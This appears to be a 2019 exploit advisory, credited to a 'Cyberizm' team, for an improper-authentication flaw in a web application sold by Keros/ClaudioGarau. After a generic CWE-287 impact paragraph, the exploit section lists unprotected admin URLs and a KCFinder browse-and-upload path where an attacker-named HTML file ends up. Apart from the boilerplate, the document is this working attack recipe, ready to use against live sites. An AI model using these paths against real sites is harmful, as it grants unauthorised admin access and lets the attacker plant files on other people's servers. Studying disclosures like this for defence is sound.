####################################################################
# Exploit Title : Keros ClaudioGarau Improper Authentication Insert File Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 19/08/2019
# Vendor Homepage : claudiogarau.it - keros-digital.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-287 [ Improper Authentication ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
####################################################################
# Impact :
***********
Authentication is any process by which a system verifies the identity of a user who wishes
to access it.When an actor claims to have a given identity, the software does not
prove or insufficiently proves that the claim is correct and besides it allows
upload a file on the system without administrator permission. Improper authentication
occurs when an application improperly verifies the identity of a user.
A software incorrectly validates user's login information and as a result, an attacker can
gain certain privileges within the application or disclose sensitive information that allows
them to access sensitive data and provoke arbitrary code execution.
The weakness is introduced during Architecture and Design, Implementation stages.
####################################################################
# Improper Authentication Exploit :
********************************
/admin/index.php?link=nuevo
/admin/modifica_scheda.php?id_scheda=2
/admin/lista.php?id=1&link=lista
/admin/categorie.php?link=categorias
/admin/categorie.php?action=modifica&id_mod=1
/admin/kcfinder/browse.php
/admin/kcfinder/upload/files/[yourfilename].html
####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################